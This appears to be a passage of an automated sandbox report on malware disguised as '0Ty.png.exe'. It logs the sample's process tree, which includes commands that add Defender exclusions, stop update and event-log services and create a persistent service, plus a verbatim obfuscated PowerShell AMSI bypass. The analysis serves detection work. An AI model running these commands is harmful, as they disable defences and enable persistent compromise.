                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:11:22:56
                                                                Start date:25/12/2024
                                                                Path:C:\Users\user\Desktop\0Ty.png.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\0Ty.png.exe"
                                                                Imagebase:0x7ff712420000
                                                                File size:5'457'920 bytes
                                                                MD5 hash:3CAE1F11044D2CA787824610A40F1696
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:11:22:56
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:11:22:56
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x7ff6d9560000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\wusa.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                Imagebase:0x800000
                                                                File size:345'088 bytes
                                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:11:22:59
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:19
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:21
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:22
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\powercfg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                Imagebase:0x7ff75d8f0000
                                                                File size:96'256 bytes
                                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:23
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:24
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\dialer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\dialer.exe
                                                                Imagebase:0x7ff7c38e0000
                                                                File size:39'936 bytes
                                                                MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:25
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:26
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe delete "HGLZSDMZ"
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:27
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:28
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'ta'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JUWLrRiAryQvoCLvYRG=CKtjhrwjgtVV @([String])([IntPtr]);$QPnZYyCGLlinWBcTXIFRjN=CKtjhrwjgtVV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nOTpineWwNN=$qragMIYqXnsdW.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'H'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+'e'+''+[Char](108)+'32'+'.'+''+[Char](100)+''+[Char](108)+'l')));$GwiYeAsQvQLFBf=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$nOTpineWwNN,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$crErzkRECYPPqZhPE=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$nOTpineWwNN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$XcrjNVu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GwiYeAsQvQLFBf,$JUWLrRiAryQvoCLvYRG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$GgrwIxrHHMksBSkCM=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$XcrjNVu,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+''+'B'+'u'+'f'+'f'+'e'+''+[Char](114)+'')));$mtiMskcCMz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($crErzkRECYPPqZhPE,$QPnZYyCGLlinWBcTXIFRjN).Invoke($GgrwIxrHHMksBSkCM,[uint32]8,4,[ref]$mtiMskcCMz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GgrwIxrHHMksBSkCM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($crErzkRECYPPqZhPE,$QPnZYyCGLlinWBcTXIFRjN).Invoke($GgrwIxrHHMksBSkCM,[uint32]8,0x20,[ref]$mtiMskcCMz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:29
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto"
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:30
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:31
                                                                Start time:11:23:00
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:32
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:33
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\sc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\sc.exe start "HGLZSDMZ"
                                                                Imagebase:0x7ff7a5b00000
                                                                File size:72'192 bytes
                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:34
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:35
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe"
                                                                Imagebase:0x7ff6d9560000
                                                                File size:289'792 bytes
                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:36
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:37
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:38
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
                                                                Imagebase:0x7ff7699e0000
                                                                File size:5'457'920 bytes
                                                                MD5 hash:3CAE1F11044D2CA787824610A40F1696
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 66%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:39
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\choice.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                Imagebase:0x7ff6bd210000
                                                                File size:35'840 bytes
                                                                MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:40
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:41
                                                                Start time:11:23:01
                                                                Start date:25/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
